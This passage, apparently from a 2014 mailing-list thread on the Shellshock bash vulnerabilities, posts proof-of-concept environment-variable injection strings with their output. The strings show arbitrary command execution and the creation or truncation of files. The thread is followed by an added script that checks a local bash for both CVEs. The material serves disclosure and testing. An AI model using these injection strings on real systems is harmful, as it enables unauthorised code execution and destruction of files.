Also, you can embed arguments, allowing for arbitrary execution:

$ env -i X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Red Hat Bugzilla Main Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="verify-v1" content="1hLjVPyIYh2cX7CL+s5A0k6pKt2FRq7/FSQ/cqGi9J8=">
<meta name="y_key" content="1cdf458efae704ba">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

On Wed, Sep 24, 2014 at 6:44 PM, Ángel González <an...@16bits.net> wrote:
> Eric Blake wrote:
> > https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> > (aka CVE-2014-6271), and points out that even _with_ this patch, there
> > is still a flaw that attackers can use to overwrite portions of the
> > filesystem, which is also a possible exploitation avenue:
> >
> > $ ls -l date
> > ls: cannot access date: No such file or directory
> > $ env -i X='() { (a)=>\' bash -c 'date'
> > bash: X: line 1: syntax error near unexpected token `='
> > bash: X: line 1: `'
> > bash: error importing function definition for `X'
> > $ ls -l date
> > -rw-------. 1 taviso taviso 0 Sep 24 14:06 date
>
> It doesn't just create 0-sized files:
>
> $ echo "{ echo 'Hello World' }" > foo.sh
>
> $ VAR='() { (a) =>\' bash foo.sh
> bash: VAR: line 1: syntax error near unexpected token `='
> bash: VAR: line 1: `'
> bash: error importing function definition for `VAR'
>
> $ cat {
> Hello World }
>
>
> OTOH, had we used bash -c foo.sh, it would have removed the script
> contents (truncated to 0 bytes).
>
>
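A local self-check for the two bash flaws shown in this thread, added here as an example and not part of the original mails; the function names are mine, it assumes a POSIX sh with `mktemp` and `env -i`, and it reuses the thread's `(a)=>\` test string plus the original CVE-2014-6271 probe, run in a throwaway directory so the stray-file side effect lands nowhere real:

```shell
#!/bin/sh
# Added self-check for the two bash environment-import flaws in this thread.
# Every probe runs in an empty environment (env -i) and, for the trailing-parse
# bug, inside a throwaway directory, so a vulnerable bash can only leave a
# stray file in that directory, never in the real filesystem.

# CVE-2014-6271: does bash execute commands appended to an exported function?
# Prints "vulnerable", "patched", or "skipped" (no bash on this host).
check_cve_2014_6271() {
    command -v bash >/dev/null 2>&1 || { echo skipped; return 0; }
    out=$(env -i X='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null || true)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# CVE-2014-7169: does the incomplete parse of '() { (a)=>\' leak into the
# -c command, turning 'date' into a redirection that creates a file "date"
# (the 0-byte file shown in the thread)?  Same three verdicts as above.
check_cve_2014_7169() {
    command -v bash >/dev/null 2>&1 || { echo skipped; return 0; }
    dir=$(mktemp -d) || { echo skipped; return 0; }
    verdict=$(
        cd "$dir" || exit 0
        # On an unpatched bash the only observable effect is the stray file.
        env -i X='() { (a)=>\' bash -c 'date' >/dev/null 2>&1 || true
        if [ -e date ]; then echo vulnerable; else echo patched; fi
    )
    rm -rf "$dir"
    echo "${verdict:-skipped}"
}

# Report both verdicts when run directly.
echo "CVE-2014-6271 (function import): $(check_cve_2014_6271)"
echo "CVE-2014-7169 (trailing parse):  $(check_cve_2014_7169)"
```

A host whose bash reports "patched" on both probes has at least the fixes for these two CVEs applied; "skipped" means no bash was found on the PATH.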